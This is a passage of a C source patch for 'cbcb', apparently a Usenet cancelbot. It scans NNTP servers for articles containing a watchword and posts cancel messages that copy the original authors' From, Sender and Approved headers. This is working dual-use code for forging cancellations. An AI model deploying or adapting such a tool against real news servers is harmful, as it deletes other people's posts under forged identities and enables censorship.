+ fprintf(stderr,"cbcb cannot open hosts file %s\n",argv[1]);
+ return(0);
+ }
+
+/* open the target file */
+
+if (NULL==(tptr=fopen(argv[2],"r")))
+ {
+ perror("open()");
+ fprintf(stderr,"cbcb cannot open target file %s\n",argv[2]);
+ return(0);
+ }
+
+#ifdef SIGPIPE
+signal(SIGPIPE,SIG_IGN); /* ignore broken pipes if this platform knows them */
+#endif
+
+/* establish the connections to the NNTP servers */
+
+if (0==cbcb_parse_hosts())
+ {
+ fprintf(stderr,"cbcb unable to connect to any NNTP servers\n");
+ return(1);
+ }
+
+fclose(sptr);
+
+if (!cbcb_parse_targets())
+ {
+ fprintf(stderr,"cbcb encountered an error processing targets\n");
+ return(1);
+ }
+
+fclose(tptr);
+
+/* final cleanup */
+for (i=0; i<nhosts; i++)
+ close_sock(hosts[i].cfd);
+#ifdef CBCB_NT
+WSACleanup();
+#endif
+
+return(0);
+}
+
+
+int cbcb_parse_hosts(void)
+{
+unsigned long host_ip;
+struct hostent *host_struct;
+struct in_addr *host_node;
+/*
+struct servent *sp;
+*/
+struct sockaddr_in serverUaddr;
+#ifdef CBCB_NT
+WSADATA wsaData; /* needed for WSAStartup */
+#endif
+
+#ifdef CBCB_NT
+if (WSAStartup(MAKEWORD(1,1),&wsaData))
+ {
+ perror_sock("WSAStartup()");
+ fprintf(stderr,"couldn't start up WinSock\n");
+ return(0);
+ }
+fprintf(stderr,"Found WinSock: %s\n",wsaData.szDescription);
+#endif
+
+#ifdef CBCB_OS2
+if (0!=sock_init())
+ {
+ perror_sock("sock_init()");
+ fprintf(stderr,"couldn't start up sockets - is inet.sys running?\n");
+ return(0);
+ }
+#endif
+
+/*
+if (NULL==(sp=getservbyname("nntp","tcp")))
+ {
+ fprintf(stderr,"Can't find the NNTP port\n");
+ return(0);
+ }
+...
+serverUaddr.sin_port=(sp->s_port);
+*/
+
+/* loop on the hosts file */
+nhosts=0;
+file_rec=0;
+while(NULL!=fgets(buffer,sizeof(buffer),sptr))
+ {
+ file_rec++;
+ if (*buffer=='#')
+  continue;
+ if (nhosts>=MAXHOSTS)
+  {
+  fprintf(stderr,"Please increase MAXHOSTS\n");
+  break;
+  }
+ if (5!=sscanf(buffer,"%2048s %hd %c %c %d",
+  hostname,&port,&hosts[nhosts].newnews_flag,&hosts[nhosts].post_flag,
+  &hosts[nhosts].timeout))
+  {
+  fprintf(stderr,"Error parsing host file line %d \"%s\"\n",file_rec,buffer);
+  continue;
+  }
+ /* verify that the newnews flag is Y or N */
+ if (hosts[nhosts].newnews_flag=='n')
+  hosts[nhosts].newnews_flag='N';
+ else if (hosts[nhosts].newnews_flag=='y')
+  hosts[nhosts].newnews_flag='Y';
+ else if (hosts[nhosts].newnews_flag!='Y'&&hosts[nhosts].newnews_flag!='N')
+  {
+  fprintf(stderr,"Newnews flag %c, must be Y or N on line %d\n",
+   hosts[nhosts].newnews_flag,file_rec);
+  continue;
+  }
+ /* verify that the posting flag is P, or I, or N */
+ if (hosts[nhosts].post_flag=='i')
+  hosts[nhosts].post_flag='I';
+ else if (hosts[nhosts].post_flag=='p')
+  hosts[nhosts].post_flag='P';
+ else if (hosts[nhosts].post_flag=='n')
+  hosts[nhosts].post_flag='N';
+ else if (hosts[nhosts].post_flag!='I'&&hosts[nhosts].post_flag!='P'&&hosts[nhosts].post_flag!='N')
+  {
+  fprintf(stderr,"Posting flag %c, must be I, or P, or N on line %d\n",
+   hosts[nhosts].post_flag,file_rec);
+  continue;
+  }
+ /* translate the hostname into an ip address. If it starts with a digit,
+ try to interpret it as a A.B.C.D address */
+ if (!isdigit(*hostname)||(0xFFFFFFFF==(host_ip=inet_addr(hostname))))
+  {
+  if (NULL==(host_struct=gethostbyname(hostname)))
+   {
+   perror("gethostbyname");
+   fprintf(stderr,"Can't resolve host name %s to ip on line %d\n",
+    hostname,file_rec);
+   continue;
+   }
+  host_node=(struct in_addr*)host_struct->h_addr;
+  fprintf(stderr,"Note: Using NNTP server at %s\n",inet_ntoa(*host_node));
+  host_ip=host_node->s_addr;
+  }
+
+ /* fill in the address to connect to */
+ memset(&serverUaddr,0,sizeof(serverUaddr));
+ serverUaddr.sin_family=PF_INET;
+ serverUaddr.sin_addr.s_addr=/*htonl*/(host_ip); /* already in net order */
+ serverUaddr.sin_port=htons(port);
+
+ /* try to create a socket */
+ if ((hosts[nhosts].cfd=socket(AF_INET,SOCK_STREAM,0))<0)
+  {
+  perror_sock("socket()");
+  continue;
+  }
+
+conn1:
+ if (0>=connect(hosts[nhosts].cfd,(struct sockaddr*)&serverUaddr,sizeof(serverUaddr)))
+  goto conn2; /* we use goto so we can use continue */
+ if (nretry>10)
+  {
+  fprintf(stderr,"give up trying to connect to %s port %hd on line %d\n",
+   hostname,port,file_rec);
+  close_sock(hosts[nhosts].cfd);
+  hosts[nhosts].newnews_flag=hosts[nhosts].post_flag='N';
+  continue;
+  }
+ perror_sock("connect()");
+ nretry++;
+ sleep(1);
+ goto conn1;
+conn2:
+ if (!cbcb_recv_resp(nhosts,'2'))
+  {
+  fprintf(stderr,"NNTP problem after connecting to %s port %hd on line %d\n",
+   hostname,port,file_rec);
+  close_sock(hosts[nhosts].cfd);
+  hosts[nhosts].newnews_flag=hosts[nhosts].post_flag='N';
+  continue;
+  }
+ nhosts++;
+ }
+
+return(nhosts);
+}
+
+int cbcb_parse_targets(void)
+{
+
+file_rec=0;
+while(fgets(buffer,sizeof(buffer),tptr)) /* read a target line */
+ {
+ file_rec++;
+ if (*buffer=='#') /* comment */
+  continue;
+ /* parse the buffer into the 8 fields */
+
+ if (9!=sscanf(buffer,"%2048s %2048s %c %2048s %2048s %d %2048s %2048s %2048s",
+  newsgroups, watchword, &subject_flag, cmsg_id_prefix, path_const,
+  &path_num, hdr_fname, txt_fname, extra_ngrp))
+  {
+  fprintf(stderr,"Error parsing 8 fields on line %d \"%s\"\n",
+  file_rec,buffer);
+  continue;
+  }
+
+/* verify that the subject flag is C, O, or N */
+
+ if (subject_flag=='c')
+  subject_flag='C';
+ else if (subject_flag=='o')
+  subject_flag='O';
+ else if (subject_flag=='n')
+  subject_flag='N';
+ else if (subject_flag!='C'&&subject_flag!='O'&&subject_flag!='N')
+  {
+  fprintf(stderr,"Subject flag %c, must be C, O, or N on line %d\n",
+   subject_flag,file_rec);
+  continue;
+  }
+
+  if (0==strcmp(path_const,sznone)) /* if 'none' is specified */
+   {
+   if (path_num==0)
+    {
+    fprintf(stderr,"Can't have path_const none and path_num 0\n");
+    continue;
+    }
+   path_const[0]=0;
+   }
+  else /* if not none, append bang if needed */
+   {
+   i=strlen(path_const);
+   if (path_const[i-1]!='!')
+    {
+    path_const[i]='!';
+    path_const[i+1]=0;
+    }
+   }
+
+  if (0==strcmp(extra_ngrp,sznone)) /* if 'none' is specified */
+   extra_ngrp[0]=0;
+  else /* if not none, append comma if needed */
+   {
+   i=strlen(extra_ngrp);
+   if (extra_ngrp[i-1]!=',')
+    {
+    extra_ngrp[i]=',';
+    extra_ngrp[i+1]=0;
+    }
+   }
+
+ /* read the extra header lines */
+
+  if (0==strcmp(hdr_fname,sznone)) /* if 'none' is specified */
+   *extra_header=0;
+  else
+   {
+   /* try to open the specified file */
+   if (NULL==(sptr=fopen(hdr_fname,"r")))
+    {
+    perror("open()");
+    fprintf(stderr,"cbcb cannot open extra-header file %s\n",hdr_fname);
+    continue;
+    }
+   nbytes=fread(buffer,1,BUFFERSIZE,sptr);
+   fclose(sptr);
+   if (nbytes>=BUFFERSIZE)
+    fprintf(stderr,"extra-header file %s is too long\n",hdr_fname);
+   if (!cbcb_copy_buffer(extra_header))
+    {
+    fprintf(stderr,"error in header file\n");
+    continue;
+    }
+   }
+
+ /* read the body the same way */
+
+  if (0==strcmp(txt_fname,sznone)) /* if 'none' is specified */
+   strcpy(extra_body,"Please cancel this article\r\n");
+  else
+   {
+   /* try to open the specified file */
+   if (NULL==(sptr=fopen(txt_fname,"r")))
+    {
+    perror("open()");
+    fprintf(stderr,"cbcb cannot open body file %s\n",txt_fname);
+    continue;
+    }
+   nbytes=fread(buffer,1,BUFFERSIZE,sptr);
+   fclose(sptr);
+   if (nbytes>=BUFFERSIZE)
+    fprintf(stderr,"body file %s is too long\n",txt_fname);
+   if (!cbcb_copy_buffer(extra_body))
+    {
+    fprintf(stderr,"error in body file\n");
+    continue;
+    }
+  }
+
+ if (!cbcb_process_target()) /* process otherwise. warn and go on if error */
+  fprintf(stderr,"cbcb encountered a problem processing target, line %d\n",
+   file_rec);
+ }
+
+return(1);
+}
+
+int cbcb_process_target(void)
+{
+
+/* loop on hosts */
+for (host1=0; host1<nhosts; host1++)
+ if (hosts[host1].newnews_flag=='Y') /* if we want to get message-ids from it */
+  {
+  cbcb_flush_sock(hosts[host1].cfd);
+
+  /* compose the rfc 977 newnews command.  Ansi C would let us write
+  nbytes=sprintf(..), but gcc has a non-compilant sprintf which return
+  buffer instead, so we must use strlen */
+  sprintf(buffer,"NEWNEWS %s %s %s GMT\r\n",
+   newsgroups,datestamp,timestamp);
+  nbytes=strlen(buffer);
+  /* send the command to the server */
+  if (nbytes!=send(hosts[host1].cfd,buffer,nbytes,0))
+   {
+   perror_sock("NEWNEWS send()");
+   continue;
+   }
+  /* the server is supposed to return a list of message-ids now */
+  if (!cbcb_parse_message_ids())
+   fprintf(stderr,"Problem parsing message-ids\n");
+   /* no 'continue': even if we return a partial queue, try to process it */
+
+  /* loop through headers, newest first */
+  while (msg_queue)
+   {
+   msg_t=msg_queue;
+   if (!cbcb_process_article(msg_queue->msgid))
+    fprintf(stderr,"Problem processing article <%s>\n",msg_queue->msgid);
+   msg_queue=msg_queue->next;
+   free(msg_t);
+   }
+
+  }
+
+return(1);
+}
+
+
+int cbcb_parse_message_ids(void)
+{
+
+msg_queue=NULL;
+parse_state=7;
+
+nretry=0;
+recv_msgids:
+ if (!cbcb_test_sock(hosts[host1].cfd)) /* nothing to read */
+ {
+ if (nretry>hosts[host1].timeout)
+  {
+  fprintf(stderr,"timeout waiting to recv message-ids\n");
+  return(0);
+  }
+ fprintf(stderr,".");
+ nretry++;
+ sleep(1);
+ goto recv_msgids;
+ }
+nbytes=recv(hosts[host1].cfd,buffer,sizeof(buffer),0);
+if (nbytes<0) /* an error shouldn't happen here */
+ {
+ perror_sock("NEWNEWS recv()");
+ return(0);
+ }
+#ifdef DEBUG
+ fwrite(buffer,1,nbytes,stdout); /* for debugging only!! */
+#endif
+/* now see if what we received makes sense */
+for (i=0; i<nbytes; i++)
+ {
+ switch(parse_state)
+  {
+ case 0:
+  if (buffer[i]=='.')
+   parse_state=4;
+  else if (buffer[i]!='<')
+   goto recv_bad_msg_id;
+  else
+   {
+   j=0;
+   parse_state=1;
+   }
+  break;
+ case 1:
+  if (buffer[i]=='>')
+   {
+/* add to the queue */
+   msg_t=(struct _msgidq*)malloc(sizeof(struct _msgidq));
+   if (msg_t==NULL)
+    {
+    fprintf(stderr,"malloc failed\n");
+    return(0);
+    }
+   msg_t->msgid=(char*)malloc(j+1);
+   if (msg_t->msgid==NULL)
+    {
+    free(msg_t);
+    fprintf(stderr,"malloc failed\n");
+    return(0);
+    }
+   memcpy(msg_t->msgid,buffer_big,j);
+   *(msg_t->msgid+j)=0;
+   msg_t->next=msg_queue;
+   msg_queue=msg_t;
+
+   parse_state=2;
+   }
+  else
+   {
+   if (j>=BUFFERBIGSIZE)
+    {
+    fprintf(stderr,"Please increase BUFFERBIGSIZE\n");
+    return(0);
+    }
+   buffer_big[j]=buffer[i];
+   j++;
+   /* parse_state=1; */
+   }
+  break;
+ case 2:
+  if (buffer[i]==ASCII_CR)
+   parse_state=3;
+  else
+   goto recv_bad_msg_id;
+  break;
+ case 3:
+  if (buffer[i]==ASCII_LF)
+   parse_state=0;
+  else
+   goto recv_bad_msg_id;
+  break;
+ case 4:
+  if (buffer[i]==ASCII_CR)
+   parse_state=5;
+  else
+   goto recv_bad_msg_id;
+  break;
+ case 5:
+  if (buffer[i]==ASCII_LF)
+   parse_state=6;
+  else
+   goto recv_bad_msg_id;
+  break;
+ case 6:  /* more data after final . */
+   goto recv_bad_msg_id;
+ case 7: /* initial, really */
+  if (buffer[i]=='2')
+   parse_state=8;
+  else
+   goto recv_bad_msg_id;
+  break;
+ case 8:
+  if (buffer[i]==ASCII_CR)
+    parse_state=3;
+  break;
+  }
+ }
+
+if (parse_state!=6)
+ goto recv_msgids;
+/* normal competion */
+return(1);
+
+recv_bad_msg_id:
+ fprintf(stderr,"Unexpected response (expected message-ids) ");
+ if (i)
+  {
+  fprintf(stderr,"after \"");
+  fwrite(buffer,1,i,stderr);
+  fprintf(stderr,"\" ");
+  }
+ if (i<nbytes)
+  {
+  fprintf(stderr,"before \"");
+  fwrite(buffer+i,1,nbytes-i,stderr);
+  fprintf(stderr,"\"");
+  }
+ fprintf(stderr,"\n");
+return(0);
+}
+
+int cbcb_process_article(char *msgid)
+{
+
+/* if there is any leftover data in the socket, get it out */
+ cbcb_flush_sock(hosts[host1].cfd);
+
+/* compose the rfc 977 head command */
+sprintf(buffer,"HEAD <%s>\r\n",msgid);
+
+/* send the command to the server */
+nbytes=strlen(buffer);
+if (nbytes!=send(hosts[host1].cfd,buffer,nbytes,0))
+ {
+ perror_sock("HEAD send()");
+ return(0);
+ }
+
+/* the server is supposed to return the article headers now */
+
+if (!cbcb_get_headers())
+ {
+ fprintf(stderr,"Problem retrieving headers\n");
+ return(0);
+ }
+
+if (!strstr(buffer_big,watchword))
+ return(1); /* no match, nothing to do */
+
+/* found the watchword: let's cancel */
+cbcb_save_headers();
+sprintf(buffer_big,"\
+Path: %s%s\r\n\
+From:%s\r\n\
+Sender:%s\r\n\
+Approved:%s\r\n\
+Newsgroups: %s%s\r\n\
+Date:%s\r\n\
+%s%s%s\
+Organization:%s\r\n\
+Control:%s\r\n\
+Message-ID: <%s%s>\r\n\
+%s\
+\r\n\
+%s\
+.\r\n",
+path_const,
+h_ptr[0],h_ptr[1],h_ptr[2],h_ptr[3],extra_ngrp,h_ptr[4],h_ptr[5],
+t_ptr[0],h_ptr[6],t_ptr[1],h_ptr[7],t_ptr[2],
+cmsg_id_prefix,msgid,extra_header,extra_body);
+
+fputs(buffer_big,stderr); /* to see what we're posting */
+
+for (host2=0; host2<nhosts; host2++)
+ if (hosts[host2].post_flag=='P'||hosts[host2].post_flag=='I')
+  {
+  cbcb_flush_sock(hosts[host2].cfd);
+  if (hosts[host2].post_flag=='P')
+   {
+   /* send the command to the server */
+   if (6!=send(hosts[host2].cfd,"POST\r\n",6,0))
+    {
+    perror_sock("POST send()");
+    continue;
+    }
+   }
+  else /*hosts[host2].post_flag=='I') */
+   {
+   sprintf(buffer,"IHAVE <%s%s>\r\n",cmsg_id_prefix,msgid);
+   nbytes=strlen(buffer);
+   /* send the command to the server */
+   if (nbytes!=send(hosts[host2].cfd,buffer,nbytes,0))
+    {
+    perror_sock("IHAVE send()");
+    continue;
+    }
+   }
+  if (!cbcb_recv_resp(host2,'3'))
+   {
+   fprintf(stderr,"NNTP problem while trying to post\n");
+   continue;
+   }
+  nbytes=strlen(buffer_big);
+  if (nbytes!=send(hosts[host2].cfd,buffer_big,nbytes,0))
+   {
+   perror_sock("article send()");
+   continue;
+   }
+  if (!cbcb_recv_resp(host2,'2'))
+   {
+   fprintf(stderr,"NNTP problem after posting\n");
+   continue;
+   }
+  }
+
+return(1); /* all's well */
+}
+
+int cbcb_get_headers(void)
+{
+
+h_ptr[0]=h_ptr[1]=h_ptr[2]=h_ptr[3]=h_ptr[4]=h_ptr[5]=h_ptr[6]=h_ptr[7]=NULL;
+h_flag=d_flag=parse_state=0;
+nretry=0;
+j=0;
+/* recv */
+recv_headers:
+
+ if (!cbcb_test_sock(hosts[host1].cfd)) /* nothing to read */
+ {
+ if (nretry>hosts[host1].timeout)
+  {
+  fprintf(stderr,"timeout waiting to recv article headers\n");
+  return(0);
+  }
+ fprintf(stderr,".");
+ nretry++;
+ sleep(1);
+ goto recv_headers;
+ }
+
+nbytes=recv(hosts[host1].cfd,buffer,sizeof(buffer),0);
+if (nbytes<0) /* an error shouldn't happen here */
+ {
+ perror_sock("headers recv()");
+ return(0);
+ }
+#ifdef DEBUG
+ fwrite(buffer,1,nbytes,stdout); /* for debugging only!! */
+#endif
+/* see if what we received makes sense */
+for (i=0; i<nbytes; i++)
+ {
+ switch(parse_state)
+  {
+ case 0:
+  if (buffer[i]=='2')
+   parse_state=1;
+  else
+   goto recv_bad_header;
+  break;
+ case 1:
+  if (buffer[i]=='2')
+   parse_state=2;
+  else
+   goto recv_bad_header;
+  break;
+ case 2:
+  if (buffer[i]==ASCII_CR)
+   parse_state=3;
+ /*
+  else
+   parse_state=2;
+ */
+  break;
+ case 3:
+  if (buffer[i]==ASCII_LF)
+   {
+   if (d_flag)
+    parse_state=5;
+   else
+    {
+    h_flag=1;
+    parse_state=4;
+    goto recv_header_save;
+    }
+   }
+  else
+   goto recv_bad_header;
+  break;
+ case 4:
+  if (buffer[i]==ASCII_CR) /* don't save cr's */
+   parse_state=3;
+  else
+   {
+   if (h_flag)
+    {
+    d_flag=0;
+    if (buffer[i]=='.')
+     d_flag=1;
+    else if (buffer[i]=='p'||buffer[i]=='P')
+     parse_state=10;
+    else if (buffer[i]=='f'||buffer[i]=='F')
+     parse_state=20;
+    else if (buffer[i]=='s'||buffer[i]=='S')
+     parse_state=30;
+    else if (buffer[i]=='a'||buffer[i]=='A')
+     parse_state=40;
+    else if (buffer[i]=='n'||buffer[i]=='N')
+     parse_state=50;
+    else if (buffer[i]=='d'||buffer[i]=='D')
+     parse_state=60;
+    else if (buffer[i]=='o'||buffer[i]=='O')
+     parse_state=70;
+    else if (buffer[i]==' '||buffer[i]=='\t') /* space means continuation */
+     j--; /* backup over the lf */
+    h_flag=0;
+    }
+   else
+    d_flag=0;
+   goto recv_header_save;
+   }
+  break;
+ case 5:  /* more data after the final . */
+   goto recv_bad_header;
+/* we recognize these headers on the fly */
+ case 10:
+    if (buffer[i]=='a'||buffer[i]=='A')
+     parse_state=11;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 11:
+    if (buffer[i]=='t'||buffer[i]=='t')
+     parse_state=12;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 12:
+    if (buffer[i]=='h'||buffer[i]=='H')
+     parse_state=13;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 13:
+    if (buffer[i]==':')
+     h_ptr[0]=buffer_big+j+1; /* Path: */
+    parse_state=4;
+   goto recv_header_save;
+ case 20:
+    if (buffer[i]=='r'||buffer[i]=='R')
+     parse_state=21;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 21:
+    if (buffer[i]=='o'||buffer[i]=='O')
+     parse_state=22;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 22:
+    if (buffer[i]=='m'||buffer[i]=='M')
+     parse_state=23;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 23:
+    if (buffer[i]==':')
+     h_ptr[1]=buffer_big+j+1; /* From: */
+    parse_state=4;
+   goto recv_header_save;
+ case 30:
+    if (buffer[i]=='e'||buffer[i]=='E')
+     parse_state=31;
+    else if (buffer[i]=='u'||buffer[i]=='U')
+     parse_state=90;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 31:
+    if (buffer[i]=='n'||buffer[i]=='N')
+     parse_state=32;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 32:
+    if (buffer[i]=='d'||buffer[i]=='D')
+     parse_state=33;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 33:
+    if (buffer[i]=='e'||buffer[i]=='E')
+     parse_state=34;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 34:
+    if (buffer[i]=='r'||buffer[i]=='R')
+     parse_state=35;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 35:
+    if (buffer[i]==':')
+     h_ptr[2]=buffer_big+j+1; /* Sender: */
+    parse_state=4;
+   goto recv_header_save;
+ case 40:
+    if (buffer[i]=='p'||buffer[i]=='P')
+     parse_state=41;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 41:
+    if (buffer[i]=='p'||buffer[i]=='P')
+     parse_state=42;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 42:
+    if (buffer[i]=='r'||buffer[i]=='R')
+     parse_state=43;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 43:
+    if (buffer[i]=='o'||buffer[i]=='O')
+     parse_state=44;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 44:
+    if (buffer[i]=='v'||buffer[i]=='V')
+     parse_state=45;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 45:
+    if (buffer[i]=='e'||buffer[i]=='E')
+     parse_state=46;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 46:
+    if (buffer[i]=='d'||buffer[i]=='D')
+     parse_state=47;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 47:
+    if (buffer[i]==':')
+     h_ptr[3]=buffer_big+j+1; /* Approved: */
+    parse_state=4;
+   goto recv_header_save;
+ case 50:
+    if (buffer[i]=='e'||buffer[i]=='E')
+     parse_state=51;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 51:
+    if (buffer[i]=='w'||buffer[i]=='W')
+     parse_state=52;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 52:
+    if (buffer[i]=='s'||buffer[i]=='S')
+     parse_state=53;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 53:
+    if (buffer[i]=='g'||buffer[i]=='G')
+     parse_state=54;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 54:
+    if (buffer[i]=='r'||buffer[i]=='R')
+     parse_state=55;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 55:
+    if (buffer[i]=='o'||buffer[i]=='O')
+     parse_state=56;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 56:
+    if (buffer[i]=='u'||buffer[i]=='U')
+     parse_state=57;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 57:
+    if (buffer[i]=='p'||buffer[i]=='P')
+     parse_state=58;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 58:
+    if (buffer[i]=='s'||buffer[i]=='S')
+     parse_state=59;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 59:
+    if (buffer[i]==':')
+     h_ptr[4]=buffer_big+j+2; /* Newsgroups:, skip space */
+    parse_state=4;
+   goto recv_header_save;
+ case 60:
+    if (buffer[i]=='a'||buffer[i]=='A')
+     parse_state=61;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 61:
+    if (buffer[i]=='t'||buffer[i]=='T')
+     parse_state=62;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 62:
+    if (buffer[i]=='e'||buffer[i]=='E')
+     parse_state=63;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 63:
+    if (buffer[i]==':')
+     h_ptr[5]=buffer_big+j+1; /* Date: */
+    parse_state=4;
+   goto recv_header_save;
+ case 70:
+    if (buffer[i]=='r'||buffer[i]=='R')
+     parse_state=71;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 71:
+    if (buffer[i]=='g'||buffer[i]=='G')
+     parse_state=72;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 72:
+    if (buffer[i]=='a'||buffer[i]=='A')
+     parse_state=73;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 73:
+    if (buffer[i]=='n'||buffer[i]=='N')
+     parse_state=74;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 74:
+    if (buffer[i]=='i'||buffer[i]=='I')
+     parse_state=75;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 75:
+    if (buffer[i]=='z'||buffer[i]=='Z')
+     parse_state=76;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 76:
+    if (buffer[i]=='a'||buffer[i]=='A')
+     parse_state=77;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 77:
+    if (buffer[i]=='t'||buffer[i]=='T')
+     parse_state=78;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 78:
+    if (buffer[i]=='i'||buffer[i]=='I')
+     parse_state=79;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 79:
+    if (buffer[i]=='o'||buffer[i]=='O')
+     parse_state=80;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 80:
+    if (buffer[i]=='n'||buffer[i]=='N')
+     parse_state=81;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 81:
+    if (buffer[i]==':')
+     h_ptr[7]=buffer_big+j+1; /* Organization: */
+    parse_state=4;
+   goto recv_header_save;
+ case 90:
+    if (buffer[i]=='b'||buffer[i]=='B')
+     parse_state=91;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 91:
+    if (buffer[i]=='j'||buffer[i]=='J')
+     parse_state=92;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 92:
+    if (buffer[i]=='e'||buffer[i]=='E')
+     parse_state=93;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 93:
+    if (buffer[i]=='c'||buffer[i]=='C')
+     parse_state=94;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 94:
+    if (buffer[i]=='t'||buffer[i]=='T')
+     parse_state=95;
+    else
+     parse_state=4;
+   goto recv_header_save;
+ case 95:
+    if (buffer[i]==':')
+     h_ptr[6]=buffer_big+j+1; /* Subject: */
+   parse_state=4;
+   goto recv_header_save;
+ default: /* how could we ever get here? */
+  goto recv_bad_header;
+  }
+ continue; /* ugly, branch around save */
+recv_header_save:
+ if (j>=BUFFERBIGSIZE)
+  {
+  fprintf(stderr,"Please increase BUFFERBIGSIZE\n");
+  return(0);
+  }
+ buffer_big[j++]=buffer[i];
+ } /* next i */
+if (parse_state!=5)
+ goto recv_headers;
+
+return(1);
+recv_bad_header:
+ fprintf(stderr,"Unexpected response (expected headers) ");
+ if (i)
+  {
+  fprintf(stderr,"after \"");
+  fwrite(buffer,1,i,stderr);
+  fprintf(stderr,"\" ");
+  }
+ if (i<nbytes)
+  {
+  fprintf(stderr,"before \"");
+  fwrite(buffer+i,1,nbytes-i,stderr);
+  fprintf(stderr,"\"");
+  }
+ fprintf(stderr,"\n");
+return(0);
+}
+
+void cbcb_save_headers(void)
+{
+/* now copy old headers to buffer for safekeeping */
+/* only if buffer_big matched the pattern */
+
+/* only Path: is special: no initial space */
+if (h_ptr[0]==NULL) /* no path */
+ {
+ j=0;
+ h_ptr[0]=" ";
+ }
+else
+ {
+ i=h_ptr[0]-buffer_big;
+ j=path_num;
+ while (buffer_big[i]!=ASCII_LF)
+  i++;
+ i--;
+ /* now go back and look for the last n bang-separated components, or the
+ beginning of path */
+ while (buffer_big[i]>' ' && j)
+  {
+  i--;
+  if (buffer_big[i]=='!')
+   j--;
+  }
+ i++;
+ j=0;
+ h_ptr[0]=buffer;
+ while (buffer_big[i]!=ASCII_LF)
+  buffer[j++]=buffer_big[i++];
+ buffer[j++]=0;
+ }
+
+t_ptr[2]=buffer+j;
+sprintf(t_ptr[2]," cancel <%s>",msg_queue->msgid);
+j+=strlen(t_ptr[2])+1;
+
+if (h_ptr[1]==NULL) /* no from? Highly unlikely */
+ h_ptr[1]=szcabal;
+else
+ cbcb_save_header(1);
+if (h_ptr[2]==NULL) /* sender */
+ h_ptr[2]=h_ptr[1];
+else
+ cbcb_save_header(2);
+if (h_ptr[3]==NULL) /* approved */
+ h_ptr[3]=h_ptr[2];
+else
+ cbcb_save_header(3);
+if (h_ptr[4]==NULL) /* no newsgroups? */
+ h_ptr[4]="control";
+else
+ cbcb_save_header(4);
+if (h_ptr[5]==NULL) /* no date??? */
+ h_ptr[5]=" 1 Jan 1990 00:00 GMT";
+else
+ cbcb_save_header(5);
+/* subject is special - must use flag */
+if (subject_flag=='O')
+ {
+ if (h_ptr[6]==NULL)
+  h_ptr[6]=szcabal; /* no subject??? */
+ else
+  cbcb_save_header(6);
+ t_ptr[0]=szsubject;
+ t_ptr[1]=szendl;
+ }
+else if (subject_flag=='C')
+ {
+ h_ptr[6]=t_ptr[2]; /* same as the Control: */
+ t_ptr[0]=szsubjectc;
+ t_ptr[1]=szendl;
+ }
+else /* if (subject_flag=='N') */
+ {
+t_ptr[0]=t_ptr[1]=h_ptr[6]=szempty;
+ }
+if (h_ptr[7]==NULL) /* organization */
+ h_ptr[7]=szcabal;
+else
+ cbcb_save_header(7);
+
+#ifdef DEBUG
+for (i=0; i<8; i++)
+ if (h_ptr[i])
+  printf("%d:%s\n",i,h_ptr[i]);
+#endif
+
+}
+
+void cbcb_save_header(int k)
+{
+i=h_ptr[k]-buffer_big;
+h_ptr[k]=buffer+j;
+while (buffer_big[i]!=ASCII_LF)
+ buffer[j++]=buffer_big[i++];
+buffer[j++]=0;
+}
+
+int cbcb_flush_sock(int sock)
+{
+  /* if there is any leftover data in the socket, get it out */
+  while (cbcb_test_sock(sock))
+   {
+   nbytes=recv(sock,buffer,sizeof(buffer),0);
+   if (nbytes<0)
+    perror_sock("flush recv()"); /* but don't abort */
+   else
+    fwrite(buffer,1,nbytes,stderr); /* display it, as it may be informative */
+   }
+return(1);
+}
+
+/* use select to see if there's data here.
+There don't seem to be any unixes left which understand poll and not select.*/
+int cbcb_test_sock(int sock)
+{
+fd_set setm;
+static struct timeval zerotime={0,0};
+
+FD_ZERO(&setm);
+FD_SET(sock,&setm);
+if (select(sock+1,&setm,NULL,NULL,&zerotime)<0)
+ {
+ perror_sock("select()");
+ }
+if (FD_ISSET(sock,&setm))
+ return(1);
+else
+ return(0);
+}
+
+int cbcb_recv_resp(int host,char c)
+{
+
+parse_state=0;
+
+nretry=0;
+recv_resp:
